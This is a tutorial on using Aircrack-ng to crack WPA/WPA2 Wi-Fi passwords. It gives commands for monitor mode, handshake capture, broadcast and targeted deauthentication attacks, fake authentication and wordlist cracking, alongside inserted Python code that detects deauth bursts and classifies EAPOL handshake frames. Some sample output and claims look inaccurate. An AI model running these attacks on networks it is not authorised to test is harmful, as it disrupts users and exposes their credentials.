Aircrack-ng

Overview of Tools

airodump-ng: Captures packets from wireless networks, providing information about available networks and connected clients.
aireplay-ng: Injects packets into the network to create traffic or perform attacks.
aircrack-ng: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
airmon-ng: Configures your wireless interface to monitor mode.

Setting Up Your Environment

Enable Monitor Mode:

sudo airmon-ng start wlan0

Replace wlan0 with the name of your wireless interface.

Verify Monitor Mode:
Run the following and check that your interface reports Mode:Monitor; airmon-ng usually renames it to wlan0mon or similar:

iwconfig

Check for Interfering Processes:

sudo airmon-ng check kill

This command stops processes that might interfere with Aircrack-ng, such as NetworkManager and wpa_supplicant. Note that this also drops your normal Wi-Fi connection until those services are restarted.

Confirm Interface Status:
After enabling monitor mode, confirm that your interface is set up correctly:

iwconfig

Prepare for Packet Capture:
Ensure your environment is ready to capture packets, typically in a location with accessible Wi-Fi networks.

Capturing Wireless Traffic

Start Airodump-ng:

sudo airodump-ng wlan0mon

This command starts capturing packets and displays nearby wireless networks.

Identify Target Network:
In the airodump-ng listing, note the target network's BSSID and channel (the BSSID and CH columns).

Filter Captured Data:
To filter for a specific network, note its BSSID and channel, then run:

sudo airodump-ng --bssid <BSSID> -c <channel> wlan0mon

Capture Handshake:
To capture the WPA/WPA2 handshake, continue monitoring until a client connects or perform a deauthentication attack.

Save Captured Data:
To save the captured packets to a file, use:

sudo airodump-ng --bssid <BSSID> -c <channel> -w capture wlan0mon

This writes the output to files with the prefix capture. airodump-ng appends a run number, so the packet capture is actually written as capture-01.cap (capture-02.cap on the next run); the steps below refer to it as capture.cap.

Targeting a Specific Network

Capture Handshake:
Start by running airodump-ng to capture packets from the target network:

sudo airodump-ng --bssid <BSSID> -c <channel> -w capture wlan0mon

Replace <BSSID> and <channel> with the target network's BSSID and channel.

Deauthenticate a Client (if needed):
If no handshake is captured, you can force a client to reconnect by sending deauthentication packets:

sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon

This command sends 10 deauth packets to the specified BSSID. Since no client is given with -c, the frames are broadcast to every client of that access point.

Monitor for Handshake Capture:
Watch the airodump-ng output for the message indicating that a handshake has been captured. It appears in the status line at the top of the airodump-ng screen as:

WPA handshake: <BSSID>

Save Captured Handshake:
Ensure that the handshake is saved in your capture.cap file for later analysis.

Verify the Capture:
After capturing the handshake, you can verify it by using:

aircrack-ng capture.cap

Generating Traffic for Handshake

Use Aireplay-ng to Generate Traffic:
To capture a WPA/WPA2 handshake, you can generate traffic on the target network. This can be done by deauthenticating a connected client, prompting them to reconnect.

Deauthenticate a Client:
Identify an active client connected to the target network. Use the following command:

sudo aireplay-ng --deauth 10 -a <BSSID> -c <client MAC> wlan0mon

Replace <BSSID> with the target network's BSSID and <client MAC> with the MAC address of the connected client. The 10 specifies the number of deauthentication packets to send.

Monitor for Handshake:
Keep airodump-ng running in a separate terminal window to watch for the handshake capture. You should see:

WPA handshake: <BSSID>

Capture Additional Traffic:
If you want to ensure more handshakes are captured, consider using fake authentication to generate additional packets on the network. Note that aireplay-ng spells the option --fakeauth (the delay value 0 means a single authentication attempt) and needs the BSSID via -a:

sudo aireplay-ng --fakeauth 0 -a <BSSID> wlan0mon

Validate the Handshake:
Once you have captured a handshake, ensure that it's saved in your capture.cap file for further analysis.
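The two deauthentication steps above (the --deauth commands) produce a recognisable pattern on the air. As an added example that is not part of the original page or the Aircrack-ng project, here is a defender-side check that flags such bursts: it counts deauthentication and disassociation frames per BSSID in a sliding window over constructed frame records and reports whether the burst was broadcast, which is what aireplay-ng sends when no -c client is given. The (timestamp, subtype, bssid, dst_mac) record layout, window and threshold are this example's assumptions.

```python
# Sliding-window detector for deauthentication bursts, the pattern the
# aireplay-ng --deauth step above produces. Input records are constructed
# (timestamp, subtype, bssid, dst_mac) tuples, e.g. exported from a WIDS
# or a monitor-mode capture; the tuple layout is this example's assumption.
from collections import defaultdict, deque

DEAUTH = 0x0C      # 802.11 management frame subtype: Deauthentication
DISASSOC = 0x0A    # Disassociation has the same effect, so count it too
BEACON = 0x08
BROADCAST = "FF:FF:FF:FF:FF:FF"

def detect_deauth_bursts(frames, window_s=2.0, threshold=5):
    """frames: time-ordered iterable of (ts, subtype, bssid, dst_mac).
    Returns one alert (ts, bssid, count, broadcast_seen) per burst, raised
    when at least `threshold` deauth/disassoc frames from one BSSID fall
    within `window_s` seconds. A single deauth (a client roaming) is normal."""
    recent = defaultdict(deque)   # bssid -> (ts, dst) pairs inside the window
    alerted = set()               # bssids already reported for the current burst
    alerts = []
    for ts, subtype, bssid, dst in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window_s:
            q.popleft()           # drop frames that fell out of the window
        if len(q) >= threshold:
            if bssid not in alerted:
                alerted.add(bssid)
                broadcast = any(d == BROADCAST for _, d in q)
                alerts.append((ts, bssid, len(q), broadcast))
        else:
            alerted.discard(bssid)  # burst is over; a new one may alert again
    return alerts

# Constructed sample: a beacon, one benign deauth, then a broadcast burst
# like the one a client-less `aireplay-ng --deauth 10 -a <BSSID>` produces.
AP = "AA:BB:CC:DD:EE:FF"
SAMPLE_FRAMES = [
    (0.0, BEACON, AP, BROADCAST),
    (1.0, DEAUTH, AP, "11:22:33:44:55:66"),   # single deauth: no alert
    (5.0, BEACON, AP, BROADCAST),
] + [(10.0 + i * 0.1, DEAUTH, AP, BROADCAST) for i in range(10)]

if __name__ == "__main__":
    for ts, bssid, count, bcast in detect_deauth_bursts(SAMPLE_FRAMES):
        kind = "broadcast" if bcast else "targeted"
        print(f"t={ts:.1f}s {kind} deauth burst from {bssid}: {count} frames")
```

A real deployment would feed frames from a monitor-mode sensor and tune the window and threshold to the site's normal roaming rate.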

Validating the Handshake

Check the Capture File:
Use the aircrack-ng tool to examine the contents of your capture file. Run the following command:

aircrack-ng capture.cap

Analyze Output:
Look for output that indicates whether a valid handshake was detected. You should see a message like:

WPA handshake: <BSSID>

Verify Handshake Quality:
If a handshake is detected, you can also assess the quality of the capture by checking the number of packets captured: more packets generally indicate a better chance of successful cracking.

Inspect with Wireshark (Optional):
If you want a deeper analysis, open the capture file with Wireshark:

wireshark capture.cap

Look for packets labeled EAPOL (display filter: eapol); these carry the four messages of the WPA/WPA2 handshake.

Crack the Handshake (Optional):
If the handshake is valid, you can proceed to attempt cracking the password using a wordlist:

aircrack-ng -w <wordlist> capture.cap

Replace <wordlist> with the path to your dictionary file.
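To make the "WPA handshake" indication and the EAPOL packets from the Wireshark step concrete, here is an added example (not from the original page or the Aircrack-ng project) that classifies EAPOL-Key frames into the four handshake messages M1..M4 from their Key Information flags and reports, per AP/client pair, which messages a capture holds. The EAPOL-Key header layout and flag bits are the standard ones; the frame tuples, MAC addresses and eapol_key() builder are constructed for the example.

```python
# Classify EAPOL-Key frames (the EAPOL packets the Wireshark step points at) into
# 4-way handshake messages M1..M4 and report which ones each AP/client pair has.
# Frame records are constructed (src_mac, dst_mac, eapol_bytes) tuples (an assumption).
from typing import Optional
EAPOL_TYPE_KEY = 3
DESCRIPTOR_RSN, DESCRIPTOR_WPA = 2, 254      # WPA2 and legacy WPA descriptors
# Key Information bits (IEEE 802.11 EAPOL-Key frame) that tell M1..M4 apart.
PAIRWISE, INSTALL, ACK, MIC, SECURE = 1 << 3, 1 << 6, 1 << 7, 1 << 8, 1 << 9

def classify_eapol_key(frame: bytes) -> Optional[int]:
    """Return 1..4 for a pairwise handshake message, else None.
    Layout: version(1) type(1) length(2) descriptor(1) key_info(2) ..."""
    if len(frame) < 7 or frame[1] != EAPOL_TYPE_KEY:
        return None
    if frame[4] not in (DESCRIPTOR_RSN, DESCRIPTOR_WPA):
        return None
    info = int.from_bytes(frame[5:7], "big")
    if not info & PAIRWISE:
        return None                      # group-key handshake, not the 4-way one
    ack, mic, secure = bool(info & ACK), bool(info & MIC), bool(info & SECURE)
    if ack and not mic:
        return 1                         # AP -> client, carries the ANonce
    if ack and mic and info & INSTALL:
        return 3                         # AP -> client, tells client to install keys
    if mic and not ack:
        return 4 if secure else 2        # client -> AP; M2 carries the SNonce
    return None

def handshake_inventory(frames):
    """Map (ap, client) -> set of message numbers seen; the AP sends M1/M3."""
    seen = {}
    for src, dst, body in frames:
        msg = classify_eapol_key(body)
        if msg is None:
            continue
        ap, client = (src, dst) if msg in (1, 3) else (dst, src)
        seen.setdefault((ap, client), set()).add(msg)
    return seen

def eapol_key(key_info: int) -> bytes:
    # Minimal EAPOL-Key header (constructed): version 2, type Key, length 95, RSN.
    return bytes([2, EAPOL_TYPE_KEY, 0, 95, DESCRIPTOR_RSN]) + key_info.to_bytes(2, "big")
AP, STA, STA2 = "AA:BB:CC:DD:EE:FF", "11:22:33:44:55:66", "77:88:99:AA:BB:CC"
SAMPLE_FRAMES = [   # constructed: full exchange for STA, only M1 for STA2
    (AP, STA, eapol_key(0x008A)), (STA, AP, eapol_key(0x010A)),    # M1, M2
    (AP, STA, eapol_key(0x13CA)), (STA, AP, eapol_key(0x030A)),    # M3, M4
    (AP, STA2, eapol_key(0x008A)),                                 # M1 only
    (AP, STA, eapol_key(0x0382)),                                  # group key: ignored
]
```

A pair that shows all four messages is what the "WPA handshake" status means; a pair with only M1 (a client that deauthenticated before answering) is not a usable capture.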

Cracking WPA/WPA2 Passwords

Ensure You Have a Handshake:
Before attempting to crack the password, confirm that you have captured a valid WPA/WPA2 handshake in your capture.cap file.

Choose a Wordlist:
Select a wordlist that contains potential passwords. You can use a built-in wordlist such as rockyou.txt, or create your own.

Run Aircrack-ng:
Use the following command to start the cracking process:

aircrack-ng -w <wordlist> capture.cap

Replace <wordlist> with the path to your wordlist file.

Monitor Progress:
As Aircrack-ng runs, it will display attempts and indicate when a password is found. It may look like this:

12345: 12:34:56:78:9A:BC

Successful Crack:
If successful, you will see output similar to:

KEY FOUND! [ password123 ]

Additional Options:
If you have a custom wordlist, use it with:

aircrack-ng -w /path/to/custom_wordlist.txt capture.cap